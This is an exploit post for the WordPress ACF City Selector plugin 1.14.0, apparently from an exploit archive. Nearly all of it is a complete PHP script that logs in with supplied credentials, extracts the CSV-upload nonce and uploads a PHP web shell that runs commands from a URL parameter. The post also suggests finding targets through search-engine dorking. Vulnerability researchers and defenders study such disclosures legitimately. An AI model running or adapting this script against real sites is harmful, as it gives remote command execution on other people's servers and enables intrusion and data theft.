WordPress ACF City Selector 1.14.0 Shell Upload

=============================================================================================================================================
    | # Title     : WordPress ACF City Selector plugin versions 1.14.0 Code Injection Vulnerability                                             |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://wordpress.org/plugins/acf-city-selector/#developers                                                                 |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] vulnerability found in WordPress ACF City Selector plugin versions 1.14.0 & suffers from a remote shell upload vulnerability.
    
    [+] save code as poc.php .
    
    [+] USage : cmd => c:\www\test\php poc.php <URL>  <USERNAME> <PASSWORD>
    
    [+] PayLoad :
    
    <?php
    error_reporting(0);
    
    function curl_request($url, $post = null, $headers = []) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_COOKIEJAR, "cookies.txt");
        curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt");
    
        if ($post !== null) {
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
        }
    
        if (!empty($headers)) {
            curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
        }
    
        $response = curl_exec($ch);
        curl_close($ch);
        return $response;
    }
    
    function get_plugin_version($url) {
        $version_url = "$url/wp-content/plugins/acf-city-selector/readme.txt";
        $response = curl_request($version_url);
        if ($response && preg_match('/Stable tag:\s*(\d+\.\d+\.\d+)/', $response, $matches)) {
            echo "[+] Detected plugin version: {$matches[1]}\n";
            return $matches[1];
        }
        echo "[-] Failed to extract version. Exiting.\n";
        exit();
    }
    
    function login_to_wordpress($url, $username, $password) {
        $login_url = "$url/wp-login.php";
        $data = [
            'log' => $username,
            'pwd' => $password,
            'rememberme' => 'forever',
            'wp-submit' => 'Log In'
        ];
        
        $response = curl_request($login_url, http_build_query($data), [
            "Content-Type: application/x-www-form-urlencoded"
        ]);
    
        return strpos($response, 'dashboard') !== false;
    }
    
    function extract_nonce($url) {
        $dashboard_url = "$url/wp-admin/options-general.php?page=acfcs-dashboard";
        $response = curl_request($dashboard_url);
    
        if (preg_match('/<input name="acfcs_upload_csv_nonce" type="hidden" value="(.*?)"/', $response, $matches)) {
            echo "[+] Extracted nonce: {$matches[1]}\n";
            return $matches[1];
        }
        echo "[-] Failed to extract nonce value.\n";
        exit();
    }
    
    function upload_shell($url, $nonce) {
        $shell = '<?php if(isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';
        $upload_url = "$url/wp-admin/options-general.php?page=acfcs-dashboard";
    
        $post_fields = [
            'acfcs_upload_csv_nonce' => $nonce,
            'acfcs_csv_upload' => new CURLFile('shell.php', 'image/jpeg', 'indoushka.php')
        ];
    
        file_put_contents('shell.php', $shell);
        
        curl_request($upload_url, $post_fields, [
            "Content-Type: multipart/form-data"
        ]);
        
        $shell_url = "$url/wp-content/uploads/acfcs/indoushka.php";
        if (curl_request($shell_url)) {
            echo "[+] Shell uploaded successfully: $shell_url\n";
        } else {
            echo "[-] Shell upload failed.\n";
        }
    }
    
    function main($url, $username, $password) {
        $plugin_version = get_plugin_version($url);
        if (version_compare($plugin_version, '1.14.0', '<=')) {
            echo "[+] Vulnerable version detected! Proceeding with exploitation.\n";
            if (login_to_wordpress($url, $username, $password)) {
                $nonce_value = extract_nonce($url);
                upload_shell($url, $nonce_value);
            } else {
                echo "[-] Failed to log in.\n";
            }
        } else {
            echo "[-] Plugin is not vulnerable. Exiting.\n";
            exit();
        }
    }
    
    if ($argc < 4) {
        echo "Usage: php script.php <url> <username> <password>\n";
        exit();
    }
    main($argv[1], $argv[2], $argv[3]);
    ?>
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================